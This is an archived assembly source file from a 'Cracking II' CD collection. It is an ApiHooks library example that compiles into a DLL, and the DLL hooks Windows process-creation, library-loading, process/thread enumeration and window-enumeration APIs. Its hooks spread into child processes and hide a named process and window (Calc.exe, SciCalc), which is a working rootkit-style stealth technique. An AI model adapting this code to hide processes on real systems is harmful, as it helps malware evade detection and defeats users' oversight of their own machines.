home *** CD-ROM | disk | FTP | other *** search
/ Cracking 2 / Cracking II..iso / Tools / ApiHooks 2.2 / examples / ASM / InvisibleW9X / Invisible.bat next >
Encoding:
DOS Batch File  |  2000-04-11  |  12.2 KB  |  359 lines
  1. ;@GOTO TRANSLATE
  2.  
  3. .586P
  4.  
  5. .MODEL            FLAT, STDCALL
  6.  
  7.    OPTION         CASEMAP: NONE
  8.    INCLUDE        WINDOWS.inc
  9.    UNICODE        = FALSE
  10.    INCLUDE        APIMACRO.mac
  11.  
  12.    INCLUDE        ApiHooks.inc
  13.  
  14.    INCLUDELIB     iKERNEL32.lib
  15.    INCLUDELIB     iUSER32.lib
  16.  
  17.    INCLUDELIB     iApiHooks.lib
  18.  
  19. ;------------------------------------------------------------------
  20. .DATA?
  21.    CurPID                   DWORD  ?
  22.    OrigEnumWinProc          DWORD  ?
  23.    prinfo     PROCESS_INFORMATION  <>
  24.    stinfo     STARTUPINFO          <>
  25.    PathHooks  SIGN  MAX_PATH DUP   (?)
  26.  
  27.  
  28.    LOADPARMS32 STRUCT
  29.     lpEnvAddress LPSTR ?
  30.     lpCmdLine    LPSTR ?
  31.     lpCmdShow    LPSTR ?
  32.     dwReserved   DWORD ?
  33.    LOADPARMS32 ENDS
  34.  
  35. .CODE
  36.    ALIGN    4
  37.    DynaHooks  API_HOOK <HOOKS_DYNAMIC>
  38.    BeginHooks Invisible
  39.    MkHook    ,      , CreateProcessA;, HOOK_ALL+HOOK_HARD
  40.    MkHook    ,      , LoadModule;,     HOOK_ALL+HOOK_HARD
  41.    MkHook    ,      , WinExec;,        HOOK_ALL+HOOK_HARD
  42.    MkHook    ,      , LoadLibraryA;,   HOOK_ALL+HOOK_HARD
  43.    MkHook    ,      , LoadLibraryExA;, HOOK_ALL+HOOK_HARD
  44.    MkHook    ,      , GetProcAddress;, HOOK_ALL+HOOK_HARD
  45.  
  46.    MkHook    ,      , Process32Next;,  HOOK_ALL+HOOK_HARD
  47.    MkHook    ,      , Thread32Next;,   HOOK_ALL+HOOK_HARD
  48.    MkHook    ,USER32, EnumWindows;,    HOOK_ALL+HOOK_HARD
  49.    MkHook    ,USER32, GetWindow;,      HOOK_ALL+HOOK_HARD
  50.   NoHooks = ($-Invisible)/API_HOOK
  51.    EndHooks
  52.  
  53.    TEXTA      KERNEL32,                 <KERNEL32.dll/0>
  54.    TEXTA      USER32,                   <USER32.dll/0>
  55.    TEXTA      CreateProcessA,           <CreateProcessA/0> 
  56.    TEXTA      LoadModule,               <LoadModule/0> 
  57.    TEXTA      WinExec,                  <WinExec/0> 
  58.    TEXTA      LoadLibraryA,             <LoadLibraryA/0> 
  59.    TEXTA      LoadLibraryExA,           <LoadLibraryExA/0> 
  60.    TEXTA      GetProcAddress,           <GetProcAddress/0> 
  61.  
  62.    TEXTA      Process32Next,            <Process32Next/0>
  63.    TEXTA      Thread32Next,             <Thread32Next/0>
  64.    TEXTA      EnumWindows,              <EnumWindows/0>
  65.    TEXTA      GetWindow,                <GetWindow/0>
  66.  
  67.    TEXTA      Proc2Hide,                <Calc.exe/0>
  68.    TEXT       Wind2Hide,                <SciCalc/0>
  69.  
  70. ;------------------------------------------------------------------
  71.   DllMain:
  72.    CMP        DWORD PTR [ESP+8], DLL_PROCESS_ATTACH
  73.    JNE        @F
  74.    iWin32     GetCurrentProcessId
  75.    MOV        CurPID, EAX
  76.    MOV        stinfo.cb, SIZEOF STARTUPINFO
  77.    iWin32i    GetModuleFileName, [ESP+12], OFFSET PathHooks, MAX_PATH
  78.   @@:
  79.    PUSH       TRUE
  80.    POP        EAX
  81.    RETN       12    
  82.  
  83. ;Helper part-----------
  84. ;------------------------------------------------------------------
  85.   NewCreateProcessA  PROC lpApplicationName, lpCommandLine,\
  86.                           lpProcessAttributes, lpThreadAttributes,\
  87.                           bInheritHandles, dwCreationFlags, \
  88.                           lpEnvironment, lpCurrentDirectory,\
  89.                           lpStartupInfo, lpProcessInformation
  90.                      MOV  EAX, dwCreationFlags
  91.                      OR   EAX, CREATE_SUSPENDED
  92.                      iWin32 CreateProcessA, lpApplicationName, lpCommandLine,\        
  93.                                             lpProcessAttributes, lpThreadAttributes,\ 
  94.                                             bInheritHandles, EAX,\       
  95.                                             lpEnvironment, lpCurrentDirectory,\        
  96.                                             lpStartupInfo, lpProcessInformation       
  97.                      TEST  EAX, EAX
  98.                      JE    @Failed
  99.                      PUSHp EAX, EBX
  100.                      MOV   EBX, lpProcessInformation
  101.                      ASSUME EBX: PTR PROCESS_INFORMATION
  102.                      iWin32 EstablishApiHooksA, OFFSET PathHooks, [EBX].dwProcessId
  103.                      TEST  dwCreationFlags, CREATE_SUSPENDED
  104.                      JNE   @F
  105.                      iWin32 ResumeThread, [EBX].hThread
  106.                     @@:
  107.                      POPc  EAX, EBX
  108.                     @Failed:
  109.                      RET                    
  110.   NewCreateProcessA  ENDP                   
  111. ;------------------------------------------------------------------
  112.   NewLoadModule  PROC lpModuleName, lpParameterBlock
  113.        MOV       EAX, lpParameterBlock
  114.        ASSUME    EAX: PTR LOADPARMS32
  115.        MOV       ECX, [EAX].lpCmdShow
  116.        MOV       EDX, [EAX].lpCmdLine
  117.        CMP       WORD PTR [ECX], 2
  118.        JNE       @Fail
  119.        MOV       CX, [ECX+2]
  120.        CMP       BYTE PTR [EDX], 0
  121.        MOV       stinfo.wShowWindow, CX
  122.        MOV       ECX, 0
  123.        JE        @F
  124.        LEA       ECX, [EDX+1]
  125.       @@:
  126.        iWin32    CreateProcessA, lpModuleName, ECX, \
  127.                                  NULL, NULL, FALSE, CREATE_SUSPENDED,\
  128.                                  [EAX].lpEnvAddress, NULL,\            
  129.                                  OFFSET stinfo, OFFSET prinfo
  130.        TEST      EAX, EAX
  131.        JNE       @F
  132.       @Fail:
  133.        LEAVE
  134.        iWin32j   LoadModule
  135.       @@:
  136.        iWin32    EstablishApiHooksA, OFFSET PathHooks, prinfo.dwProcessId
  137.        iWin32    CloseHandle, prinfo.hProcess
  138.        iWin32    ResumeThread, prinfo.hThread
  139.        iWin32    CloseHandle, prinfo.hThread
  140.        MOV       EAX, 32
  141.        RET
  142.    NewLoadModule ENDP
  143. ;------------------------------------------------------------------
  144.   NewWinExec     PROC lpszCmdLine, fuCmdShow
  145.        MOV       EAX, fuCmdShow
  146.        MOV       stinfo.wShowWindow, AX
  147.        iWin32    CreateProcessA, NULL, lpszCmdLine, \
  148.                                  NULL, NULL, FALSE, CREATE_SUSPENDED,\
  149.                                  NULL, NULL,\            
  150.                                  OFFSET stinfo, OFFSET prinfo
  151.        TEST      EAX, EAX
  152.        JNE       @F
  153.        LEAVE
  154.        iWin32j   WinExec
  155.       @@:
  156.        iWin32    EstablishApiHooksA, OFFSET PathHooks, prinfo.dwProcessId
  157.        iWin32    CloseHandle, prinfo.hProcess
  158.        iWin32    ResumeThread, prinfo.hThread
  159.        iWin32    CloseHandle, prinfo.hThread
  160.        MOV       EAX, 32
  161.        RET
  162.    NewWinExec    ENDP
  163. ;------------------------------------------------------------------
  164.   NewGetProcAddress  PROC  hLibrary, lpszProc
  165.                    CMP     lpszProc, 10000H
  166.                    JB      @GoGPA
  167.                    iWin32  GetModuleHandleA, sKERNEL32
  168.                    CMP     EAX, hLibrary
  169.                    JNE     @GoUser32
  170.  
  171.         CmpApi     MACRO   __ApiNomen
  172.                    iWin32  lstrcmp, lpszProc, s&__ApiNomen
  173.                    TEST    EAX, EAX
  174.                    JNE     @F
  175.                    MOV     EAX, New&__ApiNomen
  176.                    JMP     @RetGPA
  177.                   @@:
  178.                    ENDM
  179.  
  180.                    CmpApi  CreateProcessA
  181.                    CmpApi  LoadModule
  182.                    CmpApi  WinExec
  183.                    CmpApi  LoadLibraryA
  184.                    CmpApi  LoadLibraryExA
  185.                    CmpApi  GetProcAddress
  186.                    CmpApi  Process32Next
  187.                    CmpApi  Thread32Next
  188.                    JMP     @GoGPA
  189.  
  190.                   @GoUser32:
  191.                    iWin32  GetModuleHandleA, sKERNEL32
  192.                    CMP     EAX, hLibrary
  193.                    JNE     @GoGPA
  194.                    CmpApi  EnumWindows
  195.                    CmpApi  GetWindow
  196.  
  197.                   @GoGPA:
  198.                    LEAVE
  199.                    iWin32j GetProcAddress
  200.                   @RetGPA:
  201.                    RET
  202.   NewGetProcAddress  ENDP
  203.  
  204. ;------------------------------------------------------------------
  205.   PrepareDynamic   PROC lpLibFileName
  206.    MOV        EAX, lpLibFileName
  207.    MOV        ECX, NoHooks
  208.    JECXZ      Fin
  209.    MOV        EDX, OFFSET DynaHooks ;Invisible - API_HOOK
  210.   @@:
  211.    ADD        EDX, API_HOOK
  212.    MOV        (API_HOOK PTR [EDX]).ModuleImport, EAX
  213.    LOOP       @B
  214.   Fin:
  215.    RET 
  216.   PrepareDynamic   ENDP
  217. ;------------------------------------------------------------------
  218.   NewLoadLibraryA  PROC    lpLibFileName
  219.                    iWin32  LoadLibraryA, lpLibFileName
  220.                    TEST    EAX, EAX
  221.                    JE      @F
  222.                    PUSH    EAX
  223.                    sWin32  PrepareDynamic, lpLibFileName
  224.                    iWin32  EstablishApiHooksA, OFFSET DynaHooks, CurPID
  225.                    POP     EAX
  226.                   @@:
  227.                    RET
  228.   NewLoadLibraryA  ENDP
  229. ;------------------------------------------------------------------
  230.   NewLoadLibraryExA PROC   lpLibFileName, hFile, dwFlags
  231.                    iWin32  LoadLibraryExA, lpLibFileName, hFile, dwFlags
  232.                    TEST    EAX, EAX
  233.                    JE      @F
  234.                    CMP     dwFlags, DONT_RESOLVE_DLL_REFERENCES
  235.                    JE      @F
  236.                    CMP     dwFlags, LOAD_LIBRARY_AS_DATAFILE
  237.                    JE      @F
  238.                    PUSH    EAX
  239.                    sWin32  PrepareDynamic, lpLibFileName
  240.                    iWin32  EstablishApiHooksA, OFFSET DynaHooks, CurPID
  241.                    POP     EAX
  242.                   @@:
  243.                    RET
  244.   NewLoadLibraryExA ENDP
  245. ;------------------------------------------------------------------
  246.  
  247. ;Executive part
  248.    NewProcess32Next PROC hSnapshot, lpProcEntry32
  249.      Nochmals:
  250.       iWin32     Process32Next, hSnapshot, lpProcEntry32
  251.       TEST       EAX, EAX
  252.       JE         Fin
  253.       PUSH       EAX
  254.       MOV        EAX, lpProcEntry32
  255.       ADD        EAX, PROCESSENTRY32.szExeFile
  256.     @@:
  257.       CMP        BYTE PTR [EAX], 0
  258.       JE     @F
  259.       CMP     BYTE PTR [EAX], "\"
  260.       JE     @Fond
  261.       INC     EAX
  262.       JMP     @B
  263.     @Fond:
  264.       INC     EAX
  265.       MOV     EDX, EAX
  266.       JMP     @B
  267.     @@:
  268.       iWin32     lstrcmpiA, EDX, sProc2Hide
  269.       TEST       EAX, EAX
  270.       POP        EAX
  271.       JE         Nochmals
  272.     Fin:
  273.       RET   
  274.    NewProcess32Next ENDP
  275. ;--------------------------------------------------------------------------------
  276.    NewThread32Next PROC USES EBX, hSnapshot, lpThreadEntry32
  277.      Nochmals:
  278.       iWin32     Thread32Next, hSnapshot, lpThreadEntry32
  279.       TEST       EAX, EAX
  280.       MOV        EBX, EAX
  281.       JE         Fin
  282.       iWin32i    FindWindow, sWind2Hide, NULL
  283.       TEST       EAX, EAX
  284.       JE         Fin
  285.       PUSH       ECX
  286.       iWin32     GetWindowThreadProcessId, EAX, ESP
  287.       MOV        ECX, lpThreadEntry32
  288.       POP        EAX
  289.       CMP        EAX, (THREADENTRY32 PTR [ECX]).th32OwnerProcessID
  290.       JE         Nochmals
  291.     Fin:
  292.       MOV        EAX, EBX 
  293.       RET   
  294.    NewThread32Next ENDP
  295. ;--------------------------------------------------------------------------------
  296.   NewEnumWindows PROC lpEnumFunc, lParam
  297.    CMP        OrigEnumWinProc, NULL
  298.    JE         @F
  299.    iWin32     EnumWindows, lpEnumFunc, lParam
  300.    RET
  301.   @@:
  302.    PUSH       lpEnumFunc 
  303.    POP        OrigEnumWinProc
  304.    iWin32     EnumWindows, NewEnumProc, lParam
  305.    AND        OrigEnumWinProc, NULL
  306.    RET
  307.   NewEnumWindows ENDP
  308.  
  309.   NewEnumProc PROC USES ESI, hwnd, lParam
  310.    iWin32i    FindWindow, sWind2Hide, NULL
  311.    TEST       EAX, EAX
  312.    JE         OrigEnumP
  313.    CMP        EAX, hwnd
  314.    PUSH       TRUE
  315.    POP        EAX
  316.    JE         @F
  317.   OrigEnumP:
  318.    sWin32     OrigEnumWinProc, hwnd, lParam
  319.   @@:
  320.    RET
  321.   NewEnumProc ENDP
  322. ;--------------------------------------------------------------------------------
  323.   NewGetWindow PROC  USES EBX, hWnd, uCmd
  324.    iWin32i    FindWindow, sWind2Hide, NULL
  325.    TEST       EAX, EAX
  326.    JE         NotMe
  327.    MOV        EBX, EAX
  328.    CMP        EAX, hWnd
  329.    JNE        NotMe
  330.    CMP        uCmd, GW_CHILD
  331.    JNE        @F
  332.    SUB        EAX, EAX
  333.    RET
  334.   @@:
  335.    iWin32     GetWindow, EAX, uCmd
  336.   Next:
  337.    MOV        hWnd, EAX
  338.   NotMe:
  339.    iWin32     GetWindow, hWnd, uCmd
  340.    TEST       EAX, EAX
  341.    JE         Fin
  342.    CMP        EAX, EBX
  343.    JE         Next
  344.   Fin: 
  345.    RET
  346.   NewGetWindow ENDP
  347. ;------------------------------------------------------------------
  348.  
  349. END DllMain
  350.  
  351. :TRANSLATE
  352. @ECHO OFF
  353. ML    /c /coff /nologo Invisible.bat
  354. eLINK Invisible /nologo /DLL /EXPORT:Invisible,@1,NONAME /SUBSYSTEM:WINDOWS /MERGE:.rdata=.text /MERGE:.idata=.text /IGNORE:4078,4086REM  /BASE:0X77240000
  355. DEL   Invisible.obj
  356. DEL   Invisible.exp
  357. DEL   Invisible.lib
  358. pause
  359. cls